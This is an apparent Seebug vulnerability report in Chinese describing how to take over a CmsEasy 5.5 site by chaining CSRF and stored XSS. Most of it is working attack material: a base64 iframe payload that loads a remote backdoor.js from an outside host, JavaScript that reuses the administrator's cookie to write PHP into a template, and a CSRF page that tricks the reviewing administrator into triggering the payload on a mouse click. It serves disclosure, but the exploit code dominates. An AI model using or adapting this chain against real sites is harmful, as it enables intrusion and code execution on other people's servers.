cmseasy csrf通过一个xss最后getshell

2014-09-04T00:00:00
ID SSV:94065
Type seebug
Reporter Root
Modified 2014-09-04T00:00:00

Description

简要描述:

为什么我们要选择get类型的呢,因为get类型存储到数据库的时候触发时候管理员是察觉不到的,可以通过图片等进行操作,然后我们存储一个xss后门,这样一来,我们就可以加载一个远端的js,那么就各种无视token和referer了

详细说明:

开始我们先分析一段源代码: celive/admin/system.php:(line:128-142):

`` if($do == 'add' and $username != '') { $password = addslashes($_REQUEST['password']); $password = md5($password); $realname = addslashes($_REQUEST['realname']); $timestamp = time(); $level = addslashes($_REQUEST['level']); $departmentid = intval($_REQUEST['departmentid']); $sql = "SELECTidFROM".$config['prefix']."operatorsWHEREusername='".$username."' ANDpassword`='".$password."'"; @$result = $db->my_fetch_array($sql); if(count($result) == 0) {

$sql = "INSERT INTO `operators` (`username`,`password`,`firstname`,`level`,`timestamp`,`departmentid`) VALUES('".$username."','".$password."','".$realname."','".$level."','".$timestamp."','$departmentid')";
$db->query($sql);
}

} ```

看到这一块了没有,这里就只用了addslashes 做了过滤,然后直接插入数据库,当我们在其他地方取的时候,这时候就会触发,这里我们分析两种情况 1.如果触发时候,在获取该页面的地方不再当前回显页面,这个我们也是有办法的,而且此办法比较猥琐,管理员不知不觉还是会中招 2.如果触发时候,正好在当前页面,那么我们就不费事了,直接搞定 我们首先进行了xss各种标签的测试,很不幸运的是大部分的xss触发标签都被全局过滤了,这里和他们自带的论坛源码编辑不一样,正好漏掉了其中的一种,那就是伟大的<iframe src='xxx'> 这里我经过了测试,只有一种情况可以通过,base64编码的: <iframe src=data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==> 这里面就仅仅只是一个alert(1),我们重新加载一个远程的js,然后进行base64编码: <iframe src=data:text/html; base64 ,PHNjcmlwdCBzcmM9J2h0dHA6Ly8xOTIuMTY4LjQ3LjEzMS9iYWNrZG9vci5qcyc+IDwvc2NyaXB0Pg==> PHNjcmlwdCBzcmM9J2h0dHA6Ly8xOTIuMTY4LjQ3LjEzMS9iYWNrZG9vci5qcyc+IDwvc2NyaXB0Pg== 这个东西对应了我们远程的一个js: http://192.168.47.131/backdoor.js 下来我们访问一下看看这个js是否被成功加载:

<img src="https://images.seebug.org/upload/201409/041122372fa15c64cfa579d959bf7bbb652b84f9.png" alt="14.png" width="600" onerror="javascript:errimg(this);">

这里是404是因为我们那边机子上没有放置,我们开始编写一个远程的js,getshell,其实这里任何都可以做,比如添加管理员,修改什么之类的,因为已经无视csrf了,表单token也没有用,这里也可以进行ajax页面交互,因为跨域里面像img 和 script等这些标签是可以跨域交互的 那我们这个远程的js,这里我们简单的写一个shell,就可以: 找到后台编辑模板的地方,当然了上一次有一个人提交了一个编辑模板那边的shell,这里的前几个居然不能编辑了,我们找到了wap底下有一个footer可以编辑,不截图了直接访问: url: http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818/uploads/index.php?case=template&act=save&admin_dir=admin&site=default postdata: sid=wap_d_footer_html&slen=1996&scontent=%3C%3Fphp%20phpinfo()%3F%3E%0A%3Cdiv+id%3D%22footer%22%3E%0A%3Cdiv+class%3D%22box%22%3E%0A%3Cp%3E%C2%A9%C2%A0%3Ca+title%3D%22%7Bget('sitename')%7D%22+href%3D%22%7B%24base_url%7D%2Fwap%22%3E%7Bget('sitename')%7D%3C%2Fa%3E+All+Rights+Reserved.+%3C%2Fp%3E%0A%3Cp+class%3D%22address%22%3E%7Bget(address)%7D%3C%2Fp%3E%0A%3Cp+class%3D%22tel%22%3E%7Bget(tel)%7D%3C%2Fp%3E%0A%3Cp+class%3D%22email%22%3E%3Ca+href%3D%22index.php%3Fcase%3Dguestbook%26act%3Dindex%26t%3Dwap%22%3E%7Blang(feedback)%7D%3C%2Fa%3E%3C%2Fp%3E%0A%3Cp%3EPowered+by+%3Ca+href%3D%22http%3A%2F%2Fwww.cmseasy.cn%22+title%3D%22CmsEasy%E4%BC%81%E4%B8%9A%E7%BD%91%E7%AB%99%E7%B3%BB%E7%BB%9F%22+target%3D%22_blank%22%3ECmsEasy%3C%2Fa%3E%3C%2Fp%3E%0A%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%3Cdiv+class%3D%22footer%22+id%3D%22box_footerBody%22%3E%0A++++++++%3Cdiv+class%3D%22footer_body%22%3E%0A++++++++++++%3Cul+class%3D%22footer_ul%22%3E%0A++++++++++++++++%3Cli%3E%0A++++++++++++++++++++%3Ca+href%3D%22tel%3A%7Bget(site_mobile)%7D%22%3E%09%0A++++++++++++++++++++++++%3Cspan+class%3D%22icon+f_tel%22%3E%3C%2Fspan%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22text%22%3E%7Blang(tel)%7D%3C%2Fspan%3E%0A++++++++++++++++++++%3C%2Fa%3E%0A++++++++++++++++%3C%2Fli%3E%0A++++++++++++++++%3Cli%3E%0A++++++++++++++++++++%3Ca+href%3D%22%7B%24base_url%7D%2Findex.php%3Fcase%3Dguestbook%26act%3Demail%26t%3Dwap%22%3E%09%0A++++++++++++++++++++++++%3Cspan+class%3D%22icon+mail%22%3E%3C%2Fspan%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22text%22%3E%7Blang(email)%7D%3C%2Fspan%3E%0A++++++++++++++++++++%3C%2Fa%3E%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0A++++++++++++++++%3C%2Fli%3E%0A++++++++++++++++%3Cli%3E%0A++++++++++++++++++++%3Ca+href%3D%22%7B%24base_url%7D%2Findex.php%3Fcase%3Darchive%26act%3Dpages%26t%3Dwap%26p%3Dmap%22%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22icon+map%22%3E%3C%2Fspan%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22text%22%3E%7Blang(map)%7D%3C%2Fspan%3E%0A++++++++++++++++++++%3C%2Fa%3E%0A++++++++++++++++%3C%2Fli%3E%0A++++++++++++++++%3Cli%3E%0A++++++++++++++++++++%3Ca+href%3D%22%7B%24base_url%7D%2Findex.php%3Fcase%3Darchive%26act%3Dpages%26t%3Dwap%26p%3Dshare%22%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22icon+share%22%3E%3C%2Fspan%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22text%22%3E%7Blang(share)%7D%3C%2Fspan%3E%0A++++++++++++++++++++%3C%2Fa%3E%0A++++++++++++++++%3C%2Fli%3E%0A++++++++++++++++%3Cli%3E%0A++++++++++++++++++++%3Ca+href%3D%22%7B%24base_url%7D%2Findex.php%3Fcase%3Dguestbook%26act%3Dindex%26t%3Dwap%22+class%3D%22border_none%22%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22icon+massage%22%3E%3C%2Fspan%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22text%22%3E%7Blang(guestbook)%7D%3C%2Fspan%3E%0A++++++++++++++++++++%3C%2Fa%3E%0A++++++++++++++++%3C%2Fli%3E%0A++++++++++++%3C%2Ful%3E%0A++++++++%3C%2Fdiv%3E%0A++++%3C%2Fdiv%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E jscode:

function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i&lt;versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } return request; } var _x = ajax(); postgo(); function postgo() { src="http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818/uploads/index.php?case=template&act=save&admin_dir=admin&site=default"; data="sid=wap_d_footer_html&slen=1996&scontent=%3C%3Fphp%20phpinfo()%3F%3E%0A%3Cdiv+id%3D%22footer%22%3E%0A%3Cdiv+class%3D%22box%22%3E%0A%3Cp%3E%C2%A9%C2%A0%3Ca+title%3D%22%7Bget('sitename')%7D%22+href%3D%22%7B%24base_url%7D%2Fwap%22%3E%7Bget('sitename')%7D%3C%2Fa%3E+All+Rights+Reserved.+%3C%2Fp%3E%0A%3Cp+class%3D%22address%22%3E%7Bget(address)%7D%3C%2Fp%3E%0A%3Cp+class%3D%22tel%22%3E%7Bget(tel)%7D%3C%2Fp%3E%0A%3Cp+class%3D%22email%22%3E%3Ca+href%3D%22index.php%3Fcase%3Dguestbook%26act%3Dindex%26t%3Dwap%22%3E%7Blang(feedback)%7D%3C%2Fa%3E%3C%2Fp%3E%0A%3Cp%3EPowered+by+%3Ca+href%3D%22http%3A%2F%2Fwww.cmseasy.cn%22+title%3D%22CmsEasy%E4%BC%81%E4%B8%9A%E7%BD%91%E7%AB%99%E7%B3%BB%E7%BB%9F%22+target%3D%22_blank%22%3ECmsEasy%3C%2Fa%3E%3C%2Fp%3E%0A%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%3Cdiv+class%3D%22footer%22+id%3D%22box_footerBody%22%3E%0A++++++++%3Cdiv+class%3D%22footer_body%22%3E%0A++++++++++++%3Cul+class%3D%22footer_ul%22%3E%0A++++++++++++++++%3Cli%3E%0A++++++++++++++++++++%3Ca+href%3D%22tel%3A%7Bget(site_mobile)%7D%22%3E%09%0A++++++++++++++++++++++++%3Cspan+class%3D%22icon+f_tel%22%3E%3C%2Fspan%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22text%22%3E%7Blang(tel)%7D%3C%2Fspan%3E%0A++++++++++++++++++++%3C%2Fa%3E%0A++++++++++++++++%3C%2Fli%3E%0A++++++++++++++++%3Cli%3E%0A++++++++++++++++++++%3Ca+href%3D%22%7B%24base_url%7D%2Findex.php%3Fcase%3Dguestbook%26act%3Demail%26t%3Dwap%22%3E%09%0A++++++++++++++++++++++++%3Cspan+class%3D%22icon+mail%22%3E%3C%2Fspan%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22text%22%3E%7Blang(email)%7D%3C%2Fspan%3E%0A++++++++++++++++++++%3C%2Fa%3E%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0A++++++++++++++++%3C%2Fli%3E%0A++++++++++++++++%3Cli%3E%0A++++++++++++++++++++%3Ca+href%3D%22%7B%24base_url%7D%2Findex.php%3Fcase%3Darchive%26act%3Dpages%26t%3Dwap%26p%3Dmap%22%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22icon+map%22%3E%3C%2Fspan%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22text%22%3E%7Blang(map)%7D%3C%2Fspan%3E%0A++++++++++++++++++++%3C%2Fa%3E%0A++++++++++++++++%3C%2Fli%3E%0A++++++++++++++++%3Cli%3E%0A++++++++++++++++++++%3Ca+href%3D%22%7B%24base_url%7D%2Findex.php%3Fcase%3Darchive%26act%3Dpages%26t%3Dwap%26p%3Dshare%22%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22icon+share%22%3E%3C%2Fspan%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22text%22%3E%7Blang(share)%7D%3C%2Fspan%3E%0A++++++++++++++++++++%3C%2Fa%3E%0A++++++++++++++++%3C%2Fli%3E%0A++++++++++++++++%3Cli%3E%0A++++++++++++++++++++%3Ca+href%3D%22%7B%24base_url%7D%2Findex.php%3Fcase%3Dguestbook%26act%3Dindex%26t%3Dwap%22+class%3D%22border_none%22%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22icon+massage%22%3E%3C%2Fspan%3E%0A++++++++++++++++++++++++%3Cspan+class%3D%22text%22%3E%7Blang(guestbook)%7D%3C%2Fspan%3E%0A++++++++++++++++++++%3C%2Fa%3E%0A++++++++++++++++%3C%2Fli%3E%0A++++++++++++%3C%2Ful%3E%0A++++++++%3C%2Fdiv%3E%0A++++%3C%2Fdiv%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E"; xhr_act("POST",src,data); } function xhr_act(_m,_s,_a){ _x.open(_m,_s,false); cookie = document.cookie; if(_m=="POST"){ _x.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8"); _x.setRequestHeader("Cookie",cookie); } _x.send(_a); return _x.responseText; }

这里我们就发送一个这样的:然后我们去waf页面看看是否已经执行成功:

<img src="https://images.seebug.org/upload/201409/04113928a64ddd169cba084ab62ad1d4548e94a9.png" alt="15.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201409/041139368dcd581ac0e6ddc5ffef91559f69c925.png" alt="16.png" width="600" onerror="javascript:errimg(this);">

到这里所有的前奏我们已经测试完毕,那么我们怎么能让管理员中招呢,我们借助图片可以发送一个get请求来吧这个xss存储到数据库 我们以游客投稿的方式,看看:

<img src="https://images.seebug.org/upload/201409/041143003dc4af873d178e0e5004fa7fbd629dd3.png" alt="17.png" width="600" onerror="javascript:errimg(this);">

这里当管理员审核的时候,肯定会打开页面看一下,只要他敢看那么我们这个xss通过sql语句就注入进数据库了

<img src="https://images.seebug.org/upload/201409/04114706cf2497fc73b226c987d664e8376be6aa.png" alt="18.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201409/04114715016250cd1fab61cc20e1acb06f2ee7f1.png" alt="19.png" width="600" onerror="javascript:errimg(this);">

我们看看刚才插入数据库的效果,能否执行远程js:

<img src="https://images.seebug.org/upload/201409/041150042843649f8b2541dceb070edcb560ac59.png" alt="20.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201409/04115014ad2c1b774da7a606c792ed0dec8e5a7b.png" alt="21.png" width="600" onerror="javascript:errimg(this);">

ko到这里所有的问题已经接解决的,我们在探讨一下,当一个get请求存储起来的xss在其他页面的情况:

``` <html> <body> <script> function csrf_sql(){ var xhr = new XMLHttpRequest(); xhr.open("POST", "sql的url这里可以是get的也可以是post的", true); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------277302291911927"); xhr.withCredentials = "true"; var body = "post的数据"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); }

   function run_xss(){
        var url= "另外一个地方可以看到的xss页面的url";
        document.write('&lt;a id="openWin" href="'+url+'"&gt;&lt;/a&gt;');
        window.onclick=function(){
            document.getElementById('openWin').click(); 
        }
   }

   function sleep(n){
        var start=new Date().getTime();
        while(true) if(new Date().getTime()-start&gt;n) break;
   }
   csrf_sql();
   sleep(3000);//让这个页面卡一点,所以当三秒钟过后 当前页面就会被绑定一个鼠标点击动作,而管理员肯定会操作鼠标,这样就触发了我们的xss
   run_xss();
&lt;/script&gt;

</body> </html> ```

上面就是我们的分析操作的过程,其实这个我已经在espcms中已经得到证实,这里只提供一个操作思路,当然了大家可以随意发挥 中秋到了,祝大家节日快乐.................

漏洞证明: